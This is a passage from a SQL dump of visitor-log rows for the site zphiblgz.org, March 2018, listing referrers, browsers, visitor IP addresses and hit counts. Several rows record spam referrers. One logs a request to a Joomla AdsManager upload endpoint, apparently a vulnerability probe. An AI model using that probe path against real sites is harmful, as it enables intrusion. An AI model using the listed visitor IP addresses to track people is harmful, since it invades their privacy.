XdBu4tWzZDHDV_YiXogQJ2135C9LzQUxysFrbw6lQh2zZQ2XXw9ad0sNU0iSA&l10n=ru&cts=1521583671160&mc=4.55194054073','Chrome','Windows','40.0.2214.115','','46.242.9.174','000',1,0),(27013,'2018-03-20','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.210','000',1,0),(27014,'2018-03-20','https://zphiblgz.org','Firefox','Windows','29.0','','192.3.180.250','000',2,0),(27015,'2018-03-20','https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&ved=2ahUKEwinhOPbmfzZAhWJy4MKHZZ7BkgQjRx6BAgAEAU&url=https%3A%2F%2Fzphiblgz.org%2Fhistory%2F&psig=AOvVaw1KFIV6pKkFtP6gjpinOTBd&ust=1521679942046714','MSIE','Windows','11.0','','128.255.75.192','000',1,0),(27016,'2018-03-20','http://pospektr.ru/','MSIE','Windows','5.5','','46.118.152.50','000',1,0),(27017,'2018-03-20','https://zphiblgz.org','Edge','Windows','16.16299','','68.134.9.53','000',8,0),(27018,'2018-03-20','https://www.google.com/','Chrome','Windows','64.0.3282.186','','68.134.9.53','000',16,0),(27019,'2018-03-20','http://fartunabest.ru/','Opera','Windows','7.60','','37.115.112.228','000',1,0),(27020,'2018-03-20','https://www.google.com/','Safari','Macintosh','11.0.2','','137.198.209.206','000',3,0),(27021,'2018-03-20','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.32','000',1,0),(27022,'2018-03-20','https://www.google.com/','Safari','iPhone','11.0','','172.56.21.240','000',2,0),(27023,'2018-03-20','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(27024,'2018-03-20','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.31','000',1,0),(27025,'2018-03-20','http://strady.org.ua/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(27026,'2018-03-20','https://www.google.com/','Chrome','Chrome OS','56.0.2924.101','','184.91.57.104','000',3,0),(27027,'2018-03-21','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.28','000',1,0),(27028,'2018-03-21','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','139.59.165.96','000',2,0),(27029,'2018-03-21','https://zphiblgz.org','Firefox','Windows','8.0','','149.202.170.122','000',1,0),(27030,'2018-03-21','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(27031,'2018-03-21','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',3,0),(27032,'2018-03-21','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.31','000',1,0),(27033,'2018-03-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.170','000',1,0),(27034,'2018-03-21','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','146.185.223.252','000',1,0),(27035,'2018-03-21','http://zphiblgz.org/','Chrome','Windows','30.0.1599.13014','','195.22.127.67','000',3,0),(27036,'2018-03-21','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.178.65','000',1,0),(27037,'2018-03-21','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.178.95','000',1,0),(27038,'2018-03-21','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.28','000',1,0),(27039,'2018-03-21','http://www.zphibmaryland.org/chapters/','Chrome','Macintosh','65.0.3325.162','','76.99.109.42','000',3,0),(27040,'2018-03-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1733.5IY_xDKxWDJHKMrJ-Yb6UXsGu9Sf-catTI_aPTDEpSE.9eaf415f22bee89d90d4cf40df43fa6ba8541b1d&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043SnNUaFZPQW0ySEZtUEZIZ3FEcEt2Q3licTVRZkU3YklqMzJ1cXpQdkh0Zyws&sign=64b0a7c420d28e1a59620203ac71b5aa&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','162.243.14.235','000',2,0),(27041,'2018-03-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1733.LAMKqWsYeWYxsuzirShrfaVYUS6DXZ-ecuX5ueRsyOo.5bca01b3f9debaf68ee2a2afaf9203387e57bc00&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042VTN5Q2EzQ0NqTE82eGhzTHBnQzdoUzZFbnZSTlBzOFVuWVFsa084LWpudyws&sign=8d6cd5a53799d6b0366a64936824cda7&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.52.199.192','000',2,0),(27042,'2018-03-21','http://atyrau.xkaz.org/','MSIE','Windows','6.0','','178.137.86.152','000',1,0),(27043,'2018-03-21','https://zphiblgz.org','Safari','iPhone','11.0','','1.239.201.153','000',1,0),(27044,'2018-03-21','android-app://com.google.android.googlequicksearchbox','Chrome','Android','65.0.3325.109','','73.87.137.159','000',3,0),(27045,'2018-03-21','https://kazka.ru/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(27046,'2018-03-21','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.157','000',2,0),(27047,'2018-03-21','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.234.145','000',1,0),(27048,'2018-03-21','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.6','000',2,0),(27049,'2018-03-21','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.206','000',1,0),(27050,'2018-03-21','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.214','000',2,0),(27051,'2018-03-21','https://zphiblgz.org','Chrome','Chrome OS','64.0.3282.190','','69.143.35.179','000',12,0),(27052,'2018-03-21','http://www.bing.com/search?q=amazon','MSIE','Windows','8.0','','70.42.131.170','000',2,0),(27053,'2018-03-21','https://zphiblgz.org/history/','MSIE','Windows','9.0','','204.79.180.16','000',1,0),(27054,'2018-03-21','https://zphiblgz.org','Firefox','Windows','3.5','','144.76.23.210','000',2,0),(27055,'2018-03-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','144.76.94.114','000',2,0),(27056,'2018-03-21','https://zphiblgz.org','MetaURI','Unknown','Unknown','','94.130.15.91','000',3,0),(27057,'2018-03-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1733.CYzO_Gmr2L6A6bqg3I3Lq5UxnNShjqeQKAm2fqHWfH8.750153c7c7f216bb162e68c93e1c6c7ec2975178&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040ZXpOMjc2d3JPOGZzTkt4NEFXb2lWX01wb1pRbUtPUTVSakw0MHBKbk1xUSws&sign=c0b486ac3495f6763e59a118dc0afc40&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.119.67','000',2,0),(27058,'2018-03-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1733.KpMkYdy_jjDYcJCp6-V4iNYRcFVO-USWUPq9m7T7GDU.73a14ffe2b9e9a5345b7f59e44556e1c475aee30&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041LWZYTlI2M0d1UlBiU205MWRKQXpOUGZ5djZ5R0xiTFBMWVpnc2tZTXlLdyws&sign=86b268b98657baeaf55318ecca9cb1b9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.149.205','000',2,0),(27059,'2018-03-21','http://www.google.com/','Chrome','Android','65.0.3325.109','','99.22.26.54','000',2,0),(27060,'2018-03-21','http://www.zphibmaryland.org/chapters/','Chrome','Android','65.0.3325.109','','73.39.186.188','000',4,0),(27061,'2018-03-21','https://zphiblgz.org','MailChimp','Unknown','Unknown','','35.229.79.130','000',1,0),(27062,'2018-03-21','https://zphiblgz.org','MailChimp','Unknown','Unknown','','35.190.151.197','000',1,0),(27063,'2018-03-21','https://www.bing.com/','Firefox','Linux','52.0','','173.64.82.150','000',3,0),(27064,'2018-03-21','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','96.234.210.118','000',3,0),(27065,'2018-03-21','https://www.google.com/','Safari','iPhone','11.0','','76.99.109.42','000',3,0),(27066,'2018-03-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1733.gz1FFzg8p54E_ozdHM7a8OoLaTZmEsJHHyODah9mjAI.7e0a7c950addb9f258e1d0210b4fec2b7b4fd2d3&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043N3NNZVc2Vl96S2dmX2V6UmFYa05ET044WnItRUJlWmJqczZ4Q2dCZXNydyws&sign=2a502fe26e0616b777517a9b4fd9ef14&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.52.192.177','000',2,0),(27067,'2018-03-21','https://www.google.com/','Chrome','Macintosh','65.0.3325.162','','68.134.0.6','000',4,0),(27068,'2018-03-21','https://www.google.com/','Chrome','Windows','64.0.3282.186','','73.129.22.251','000',2,0),(27069,'2018-03-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(27070,'2018-03-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1733.rh1AjnolluBtCCj2bHItJY-5aiI6ybr-EBkFSCur180.ba5b579f3031e1ec1b0defc8acfcf913a6912c10&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040aDh2aWp3RDBUckRVS2ZoeFExZjRNYUVTWm1xOGE1UXRCZDhOSndvdnhNUSws&sign=b47df07388936e95b0c756c0441c4afe&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','52.77.217.75','000',2,0),(27071,'2018-03-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1733.SkoyaO0CYjNSHxmbr6LkG1v0aohoA_VSSIkC0QCvpAM.3a8bd2b093519ca12a837a1424a55d931fa9d9c2&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041SnBqM0RGNDROZnNNanJUZkVaSnJ1U1UwOTJ6aGtacmZVMGR4ZWZzdE1MZyws&sign=a3a04613981a7ccc38d50c57587bae01&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.65.28.205','000',2,0),(27072,'2018-03-21','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.7.184','000',1,0),(27073,'2018-03-21','https://zphiblgz.org/history/','Chrome','Linux','41.0.2272.118','','66.102.7.186','000',1,0),(27074,'2018-03-21','https://owa.howardcc.edu/owa/','Safari','iPhone','11.0','','73.213.179.69','000',2,0),(27075,'2018-03-21','https://zphiblgz.org','Chrome','Windows','50.0.2661.75','','5.135.138.188','000',1,0),(27076,'2018-03-21','https://zphiblgz.org','Chrome','Android','65.0.3325.109','','96.244.195.93','000',14,0),(27077,'2018-03-21','http://m.facebook.com','Safari','iPhone','11.0','','31.13.114.52','000',1,0),(27078,'2018-03-21','http://m.facebook.com','Safari','iPhone','11.0','','31.13.114.51','000',1,0),(27079,'2018-03-21','http://zphiblgz.org/scholarship/','Safari','iPhone','11.0','','31.13.114.53','000',1,0),(27080,'2018-03-21','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','96.244.195.93','000',21,0),(27081,'2018-03-21','https://www.google.com/','Safari','iPhone','11.0','','69.250.77.156','000',6,0),(27082,'2018-03-21','http://zphiblgz.org/','Chrome','Macintosh','63.0.3239.132','','146.185.223.150','000',3,0),(27083,'2018-03-21','http://zphiblgz.org/','Opera','Windows','12.17','','146.185.223.150','000',2,0),(27084,'2018-03-21','https://zphiblgz.org','Safari','Macintosh','11.0.2','','146.185.223.150','000',1,0),(27085,'2018-03-21','http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.zphiblgz.org%2Fscholarship&h=ATPDgU3SUcQJT3lfj1shHV8Kn8SO8xua0tAFCX3RaupCVPnp_GAhs7e8eYAjL5TnTa0WiqALoZIZydKa4o64jQXzUHatPKw7NNpK_LmbD_k_4FsCQ2lptTWo9g_D-g','Chrome','Windows','64.0.3282.186','','66.220.151.91','000',1,0),(27086,'2018-03-21','http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.zphiblgz.org%2Fscholarship&h=ATPDgU3SUcQJT3lfj1shHV8Kn8SO8xua0tAFCX3RaupCVPnp_GAhs7e8eYAjL5TnTa0WiqALoZIZydKa4o64jQXzUHatPKw7NNpK_LmbD_k_4FsCQ2lptTWo9g_D-g','Chrome','Windows','64.0.3282.186','','66.220.151.93','000',1,0),(27087,'2018-03-21','http://zphiblgz.org/scholarship/','Chrome','Windows','64.0.3282.186','','66.220.151.90','000',1,0),(27088,'2018-03-21','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(27089,'2018-03-21','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.167.183','000',1,0),(27090,'2018-03-21','http://headpharmacy.com/','MSIE','Windows','6.0','','46.118.152.50','000',3,0),(27091,'2018-03-21','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.43','000',1,0),(27092,'2018-03-21','https://t.co/UGy854pPnQ','Chrome','Windows','57.0.2987.133','','40.107.238.1','000',1,0),(27093,'2018-03-21','https://t.co/UGy854pPnQ','Chrome','Windows','57.0.2987.133','','40.107.238.8','000',1,0),(27094,'2018-03-21','http://zphiblgz.org/scholarship/','Chrome','Windows','57.0.2987.133','','40.107.238.5','000',1,0),(27095,'2018-03-21','http://gezlev.com.ua/','MSIE','Windows','6.0','','178.137.91.90','000',3,0),(27096,'2018-03-21','http://skinali.photo-clip.ru/','Unknown','Unknown','Unknown','','46.118.152.50','000',3,0),(27097,'2018-03-21','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(27098,'2018-03-21','http://stat.lviv.ua/','Opera','Windows','9.00','','178.159.37.55','000',2,0),(27099,'2018-03-21','https://zphiblgz.org','Chrome','Macintosh','51.0.2704.84','','199.19.224.189','000',2,0),(27100,'2018-03-21','https://www.google.com/','Edge','Windows','16.16299','','69.250.65.28','000',9,0),(27101,'2018-03-21','http://incitystroy.ru/','MSIE','Windows','2.0d','','46.118.152.50','000',3,0),(27102,'2018-03-21','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','68.134.12.220','000',4,0),(27103,'2018-03-21','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.28','000',1,0),(27104,'2018-03-21','https://www.google.com/','Chrome','Windows','64.0.3282.186','','69.250.65.28','000',2,0),(27105,'2018-03-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','205.201.132.14','000',4,0),(27106,'2018-03-21','https://zphiblgz.org','MSIE','Windows','9.0','','34.209.175.228','000',3,0),(27107,'2018-03-21','https://zphiblgz.org','MSIE','Windows','7.0','','185.185.132.29','000',2,0),(27108,'2018-03-21','https://zphiblgz.org','Safari','iPhone','11.0','','69.143.35.179','000',3,0),(27109,'2018-03-21','https://zphiblgz.org','MSIE','Windows','8.0','','34.209.182.200','000',3,0),(27110,'2018-03-21','https://4inn.ru/','MSIE','Windows','6.0','','37.115.112.228','000',3,0),(27111,'2018-03-21','http://www.inet-shop.su/','Opera','Windows','8.01','','178.137.86.152','000',2,0),(27112,'2018-03-21','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(27113,'2018-03-21','https://zphiblgz.org','Safari','iPhone','11.0','','68.134.114.64','000',6,0),(27114,'2018-03-21','http://sucuri.net','MSIE','Windows','8.0','','162.216.19.183','000',7,0),(27115,'2018-03-21','https://zphiblgz.org','Ipad','Unknown','Unknown','','7.14.76.179','000',1,0),(27116,'2018-03-21','https://zphiblgz.org','Safari','iPhone','4.0','','162.216.19.183','000',1,0),(27117,'2018-03-21','https://zphiblgz.org','AppleWebkit','Android','534.30','','162.216.19.183','000',1,0),(27118,'2018-03-21','http://www.facebook.com/','Chrome','Windows','17.0.963.79','','162.216.19.183','000',1,0),(27119,'2018-03-21','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','51.255.155.167','000',2,0),(27120,'2018-03-21','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(27121,'2018-03-21','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.27','000',1,0),(27122,'2018-03-22','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.28','000',1,0),(27123,'2018-03-22','https://zphiblgz.org','Chrome','Macintosh','26.0.1410.65','','54.202.44.183','000',2,0),(27124,'2018-03-22','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.30','000',1,0),(27125,'2018-03-22','http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.zphiblgz.org%2Fscholarship&h=ATPOJT4xt1uasuZl8dzEXjs2oNLtL5Md3l20ewm_oBXLabwsg0CdJ39bu6q3NjO6x2aUetp7V_6__lBvJVtS-yJ1fCOZUDgUGeqk8SXKZnEbP1JsFLp31p515_Jp7Q','Chrome','Windows','65.0.3325.162','','69.171.240.16','000',1,0),(27126,'2018-03-22','http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.zphiblgz.org%2Fscholarship&h=ATPOJT4xt1uasuZl8dzEXjs2oNLtL5Md3l20ewm_oBXLabwsg0CdJ39bu6q3NjO6x2aUetp7V_6__lBvJVtS-yJ1fCOZUDgUGeqk8SXKZnEbP1JsFLp31p515_Jp7Q','Chrome','Windows','65.0.3325.162','','69.171.240.19','000',1,0),(27127,'2018-03-22','http://zphiblgz.org/scholarship/','Chrome','Windows','65.0.3325.162','','69.171.240.18','000',1,0),(27128,'2018-03-22','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(27129,'2018-03-22','http://www.zphiblgz.org/index.php?option=com_adsmanager&task=upload&tmpl=component','Chrome','Windows','42.0.2311.152','','207.244.149.26','000',2,0),(27130,'2018-03-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.210.246','000',2,0),(27131,'2018-03-22','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.165.74','000',2,0),(27132,'2018-03-22','https://zphiblgz.org','Safari','Macintosh','11.0.2','','146.185.223.150','000',2,0),(27133,'2018-03-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.176.9','000',2,0),(27134,'2018-03-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.222.190','000',2,0),(27135,'2018-03-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.184.242','000',1,0),(27136,'2018-03-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.208.167','000',2,0),(27137,'2018-03-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.188.195','000',2,0),(27138,'2018-03-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.208.117','000',2,0),(27139,'2018-03-22','https://hoztorg-opt.ru/','MSIE','Windows','6.0','','46.119.121.22','000',3,0),(27140,'2018-03-22','https://zphiblgz.org','Python-urllib','Unknown','2.7','','89.36.215.140','000',9,0),(27141,'2018-03-22','https://zphiblgz.org','Firefox','Windows','40.1','','210.186.111.104','000',2,0),(27142,'2018-03-22','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.30','000',1,0),(27143,'2018-03-22','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(27144,'2018-03-22','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1734.k_ZrDjuhvhxcp7kx22FkeZCbqLWDHNwk6QPiDUPI8i0.0999aa6a3f2aed6b7a700d874dcd98e0a88b48a1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040YUpOSGRXbHF2SXZSUWlMalROakVhWTlqOUFVTHZZcEI3blZ6eDBxa0VaQSws&sign=6b81033febd2b6b40e8c437c07dee668&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','51.255.140.207','000',2,0),(27145,'2018-03-22','http://m.facebook.com','Safari','iPhone','10.0','','31.13.114.10','000',1,0),(27146,'2018-03-22','https://zphiblgz.org/scholarship/','Safari','iPhone','10.0','','31.13.114.8','000',1,0),(27147,'2018-03-22','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','174.203.9.51','000',2,0),(27148,'2018-03-22','http://kipu.crimea.ua/','MSIE','Windows','6.0','','178.137.86.152','000',3,0),(27149,'2018-03-22','http://m.facebook.com/','Chrome','Android','65.0.3325.109','','73.87.137.159','000',2,0),(27150,'2018-03-22','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.17','000',1,0),(27151,'2018-03-22','http://m.facebook.com/','Chrome','Android','65.0.3325.109','','69.251.190.175','000',2,0),(27152,'2018-03-22','http://fartunabest.ru/','MSIE','Windows','6.0','','37.115.112.228','000',3,0),(27153,'2018-03-22','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1734.8HtF-msgrbDAHBPzGQYWlbnYd5-3wDhUBPBRkAKqx2U.f3635917a4613155ff0433e1a0e87e54e47543d5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041eExpM0p3Q0RoajAxNVY0OVdIZUxDaGhvR3B1TmZkYW9FbFNTeHF5VVRpdyws&sign=5f90a5aae2237a11fa922d084030ac5e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.14.33','000',2,0),(27154,'2018-03-22','https://zphiblgz.org','Chrome','Macintosh','51.0.2704.84','','14.202.250.89','000',2,0),(27155,'2018-03-22','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','69.143.35.179','000',2,0),(27156,'2018-03-22','http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.zphiblgz.org%2Fscholarship&h=ATODn5jLrSSqh1MlzNWn5ycKmW-4dB0qdJ7gqtIqt1SvWSvaOJ2O2XYcGprC7G1ycDM29ZAhKhHq53F5M0IqPzgXVEnESh_TXEQBfjOr1ltQAVASQ9AXNtqY6RmWMHfWIw','MSIE','Windows','11.0','','12.183.19.14','000',3,0),(27157,'2018-03-22','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1734.R2tC4h2ke3nRgB6uIG_GBMt051xNhcQeSiFSzXyq08I.d295f2b724e9e81ebb32a2025669fef35faccfe9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043OXdOYkZsSUo3VDFiZHBiaTRPLVVkREUtR0E3aUFnMGJKekRmWWZROFZuZyws&sign=f5290ec9898d02ac213e7d15ae6ec06c&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','35.183.20.184','000',2,0),(27158,'2018-03-22','http://12u.info/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(27159,'2018-03-22','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1734.JheSMxBvMqpvrkEggphvecDfSBe9nlN6blu8YYNKKEM.0f8219d6eaae87117ca39ccf8bf3e8c8e014cf34&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042UENqT0w2eVd4ZTlQQkw2UTBzdG91MFcwXzZZcy1DZ2Y1N1Y0X1BZbmhQdyws&sign=3ca23c89d2c4132a93ba7dff36f4397b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.100.168','000',2,0),(27160,'2018-03-22','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1734.7ol-aFC9TOrJli4iM8fPqa3g2kffg-z8RcLqjg2NCcw.6a37ced2d11c020460a92452433c4ceacb6b1eaf&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042emRfSTVhTi0xMndsQXRRWW1raXdfRk9DZEg5OWNPQVVwWTlxSHIzVVNDQSws&sign=34ca578cb1566d4a1fe3c809d9ecfb94&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','89.145.161.112','000',2,0),(27161,'2018-03-22','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','166.216.165.62','000',2,0),(27162,'2018-03-22','http://profnastil-moscow.ru/','MSIE','Windows','6.0','','178.137.91.90','000',2,0),(27163,'2018-03-22','https://zphiblgz.org','Firefox','Linux','57.0','','136.243.17.161','000',1,0),(27164,'2018-03-22','https://zphiblgz.org/','Firefox','Windows','30.0','','178.159.37.18','000',3,0),(27165,'2018-03-22','https://zphiblgz.org','Safari','iPhone','11.0','','68.33.93.177','000',4,0),(27166,'2018-03-22','http://zphiblgz.org/scholarship/','Safari','iPhone','11.0','','99.203.17.148','000',1,0),(27167,'2018-03-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','94.48.22.61','000',1,0),(27168,'2018-03-22','https://zphiblgz.org','curl','Unknown','7.29.0','','145.249.105.233','000',4,0),(27169,'2018-03-22','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','73.173.37.160','000',2,0),(27170,'2018-03-22','https://zphiblgz.org','Firefox','Windows','40.1','','191.217.127.108','000',2,0),(27171,'2018-03-22','http://m.facebook.com/','Chrome','Android','65.0.3325.109','','71.121.249.91','000',10,0),(27172,'2018-03-22','https://zphiblgz.org','Firefox','Windows','7.0.1','','178.209.42.84','000',1,0),(27173,'2018-03-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(27174,'2018-03-22','https://zphiblgz.org','Firefox','Windows','59.0','','73.163.227.238','000',6,0),(27175,'2018-03-22','https://zphiblgz.org','Chrome','Windows','65.0.3325.162','','73.200.187.175','000',19,0),(27176,'2018-03-22','https://zphiblgz.org/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','Firefox','Windows','3.5.3','','173.234.58.237','000',1,0),(27177,'2018-03-22','https://zphiblgz.org/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','Firefox','Windows','3.0.14','','173.208.91.160','000',1,0),(27178,'2018-03-22','http://m.facebook.com/','Chrome','Android','52.0.2743.98','','99.203.16.49','000',3,0),(27179,'2018-03-22','https://zphiblgz.org','python-requests','Unknown','2.18.4','','185.81.157.155','000',1,0),(27180,'2018-03-22','https://zphiblgz.org/scholarship/recommendation/','Safari','iPhone','11.0','','216.99.180.240','000',2,0),(27181,'2018-03-22','http://zphiblgz.org/scholarship/','Chrome','Macintosh','63.0.3239.132','','173.64.115.6','000',12,0),(27182,'2018-03-22','https://www.google.com/','Chrome','Windows','65.0.3325.162','','71.126.169.163','000',7,0),(27183,'2018-03-22','http://rql.kiev.ua/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(27184,'2018-03-22','https://zphiblgz.org','AppleWebKit','Windows','534','','157.55.39.157','000',1,0),(27185,'2018-03-22','http://m